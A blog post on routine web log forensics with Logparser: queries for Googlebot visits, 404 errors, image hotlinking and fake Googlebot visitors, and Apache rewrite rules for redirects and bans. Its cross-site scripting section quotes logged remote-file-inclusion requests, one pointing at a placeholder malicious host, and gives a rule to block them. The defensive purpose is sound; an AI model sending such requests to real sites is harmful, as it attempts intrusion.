Safeguard your web site with routine web log analysis and forensics
Whether you are running Drupal, WordPress, ExpressionEngine, Joomla or in fact any web site, one of the regular tasks you should carry out is a bit of log analysis. Protecting your web site is often left up to modules, plugins or someone else until it is too late.
We all rely on Google Analytics to tell us about visitors and maybe use our log analysis software (AWStats, Webalizer etc) to report on log entries - but it is always worth using tools locally to dig deeper into your logs. These can range from simple reports on accesses to your site to more detailed forensic analysis of site activity.
By doing this we get to know better how visitors are accessing our site and can uncover some interesting answers to questions such as:
- How often is Google actually spidering my site?
- How many errors am I getting and what are they?
- Who is stealing my content?
- Is anyone trying to crack my site?
In this post I will briefly cover some useful techniques to analyse your logs and see if anyone is abusing your hospitality.
We host our CMS sites on Linux-based servers and develop locally on a mixture of WAMP and LAMP. This post covers WAMP tools; you might find equally useful tools for LAMP and MAMP. I also use Logparser to do forensic analysis on IIS logs, event logs and other log formats; if you are using it for Apache logs you will need to select the NCSA log file format.
For this we are going to look at Logparser and Logparser Lizard, which allow us to use SQL-like queries to process our logs.
First off - where do you get these tools?
- Logparser (Microsoft)
- Logparser Lizard (Lizard Labs - http://www.lizard-labs.net/PageHtml.aspx?lng=2&PageId=18&PageListItemId=17)
I don't aim to cover the full installation and use of these here - they both have ample online help.
In short, follow the installation instructions and get Logparser Lizard set up.
One thing I find very useful is to use the Options to set up key/values for my log folders so they can be referenced in the queries as #WebLogs# rather than typing out the file reference every time. Also, once you have some useful queries, save them to a query group so you can use them again and again.
How often is Google actually spidering my site
You can query your logs for entries with the Googlebot user agent (the full string is shown in the query below), so something like the following will give you a count of Google hits per day:
SELECT TO_Date(datetime) as Day, count(*) as count
FROM #WebLogs#mysite.com
where user-agent = 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
group by Day
Usefully, you could also check the logs to look at the progression of requests by Google, to see that the entries make sense and don't contain any 404 File Not Found pages.
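For example, a variation on the query above (assuming the same log fields) will list any pages Googlebot requested that came back as 404 Not Found:
SELECT Request, count(*) as countofhits
FROM #WebLogs#mysite.com
where user-agent = 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
and statuscode = 404
group by Request
order by countofhits desc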
How many errors am I getting and what are they
One of the queries I run on a regular basis is a count of all error pages to ensure I am not getting any ; )
SELECT statuscode AS Status, COUNT(*) AS Total
FROM #WebLogs#mysite.com
GROUP BY Status
ORDER BY Total DESC
If you find you have a lot of 404 errors, for example, it is worth summarising these and putting in rewrite rules to redirect any visits to a better page. You might find that some are fishing for vulnerable pages, and if you get a regular culprit you can block them outside of Drupal so you don't waste resources on them again.
Checking on missing pages and images - 404 errors
The following query will count the number of hits on missing pages. Note it also ignores certain IP addresses - put yours in here so that you can ignore your own hits.
SELECT distinct Request, count(*) as countofhits
FROM #WebLogs#mysite.com
where statuscode = 404 and remotehostname not in ('123.123.123.123';'123.123.123.124')
group by Request
order by countofhits desc
Once you find a page that is being requested but is missing from your site you can add a redirect to your httpd.conf or .htaccess file.
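For a single page, a minimal sketch would be something like the following (old-page.htm and /new-page are hypothetical - substitute your own paths):
# hypothetical example: permanently redirect one missing page to its replacement
RewriteRule ^old-page\.htm$ /new-page [L,R=301]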
We recently upgraded an old site for a customer from static html and asp to Drupal, so we wanted to redirect all of the old htm and asp pages to the new home page - but in this case we wanted to have a closed.htm page so that we could put the site into maintenance mode outside of Drupal.
# catch-all for old asp, htm and html pages
RewriteCond %{REQUEST_URI} !^/closed\.htm
RewriteRule ^(.*)\.(asp|html|htm)$ / [L,R=301]
So the above example permanently redirects all requests for asp, htm and html pages to the site root, unless they ask for closed.htm.
You can simply delete the RewriteCond line (I put it here to show that you can redirect all htm files except one or two specific ones you may still need).
Who is stealing my content or trying to hack my site
It is always worth seeing if someone is linking to content on your site (images etc) without having browsed to your site.
In this case you will see requests for images that have no referrer set. This is not an exact science, so you don't want to block these per se, but it is worth having a look to understand the 'uses' of your site.
SELECT *
FROM #WebLogs#mysite.com
where referer is null and IPV4_TO_INT(RemoteHostName) not BETWEEN IPV4_TO_INT('66.249.65.0') AND IPV4_TO_INT('66.249.68.255')
and remotehostname not in ('123.123.123.123';'123.123.123.124')
and ((index_of(request,'.png') > -1) or (index_of(request,'.gif') > -1) or (index_of(request,'.jpg') > -1))
order by datetime desc
This will show all requests for images (png, gif and jpg - add to the list as you wish) that haven't come from a request for a page first.
This is not normally too critical but often throws up some interesting visits that may be malicious or unwanted.
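If you want to see which hosts are doing this the most, a variation on the query above (same fields, just grouped by host rather than listing every request) is:
SELECT RemoteHostName, count(*) as countofhits
FROM #WebLogs#mysite.com
where referer is null
and ((index_of(request,'.png') > -1) or (index_of(request,'.gif') > -1) or (index_of(request,'.jpg') > -1))
group by RemoteHostName
order by countofhits desc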
Recently I ran a quick check and found that someone was impersonating the Googlebot when accessing my site.
I normally run a simple report to count visits by the Googlebots and check that they are getting the access they need to index my sites - something like:
SELECT TO_Date(datetime) as Day, count(*) as count
FROM #WebLogs#mysite.com
where user-agent = 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
group by Day
However, that assumes that everyone declaring themselves to be Google (in the user agent string) is actually Google.
If you run the following query:
SELECT *
FROM #WebLogs#mysite.com
WHERE INDEX_OF(user-agent,'Googlebot') > -1
This gives you a list of all of the visits by user agents stating they are Googlebot.
If you eyeball the list of IP addresses you can see most will be in the range 66.249.65.0 to 66.249.68.255.
You can check which IP addresses Google actually uses, but this is good enough.
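To make that eyeballing easier, you could summarise the same user agent filter by host - again just a variation on the query above:
SELECT RemoteHostName, count(*) as countofhits
FROM #WebLogs#mysite.com
WHERE INDEX_OF(user-agent,'Googlebot') > -1
group by RemoteHostName
order by countofhits desc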
So now run a report on what visits you have had from user agents saying they are Googlebot but that come from a different subnet.
SELECT *
FROM #WebLogs#mysite.com
WHERE IPV4_TO_INT(RemoteHostName) not BETWEEN IPV4_TO_INT('66.249.65.0') AND IPV4_TO_INT('66.249.68.255')
and INDEX_OF(user-agent,'Googlebot') > -1
And Bob's your uncle - you get a few impostors.
You can then check what they are doing and, if you think they are worth banning, put a line in your httpd.conf or .htaccess to ban them.
Cross Site Scripting attacks - XSS
Be on the lookout for cross-site scripting attack attempts such as:
GET /DB_active_rec.php?BASEPATH=http:// HTTP/1.1
and
GET /apage.php//?_PHPLIB[libdir]=http://www.somescuzzysite.mal/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1
This is where a malicious visitor is trying to get your site to run code referenced on an external site.
These can be countered by the following in your httpd.conf or .htaccess files.
# XSS exploit of CodeIgniter - PHP injection attempts
#RewriteCond %{QUERY_STRING} ^BASEPATH=(.*)$
#RewriteRule ^db_active_rec\.php$ - [F,L,NC]
# this can be replaced with a more generic one
RewriteCond %{QUERY_STRING} ^((.*)=http|_PHPLIB\[libdir\]=)(.*)$ [NC]
RewriteRule ^.* - [F,L]
Blocking unwanted visitors
If after a bit of analysis you find a regular offender (once is regular enough!), you can locate their IP address and ban them specifically by adding the following to your httpd.conf or .htaccess files.
# some security (note these are not real ip addresses!)
RewriteCond %{REMOTE_ADDR} ^(123\.456\.789\.123|123\.456\.789\.124)$
RewriteRule ^(.*)$ - [F,L]
Conclusion
As you can see, with a bit of work it is easy to interrogate your logs locally and really dig into your site activity.
This is an essential security task and one that will regularly throw up some interesting issues. I will update this post with any more routine scripts if I think of any.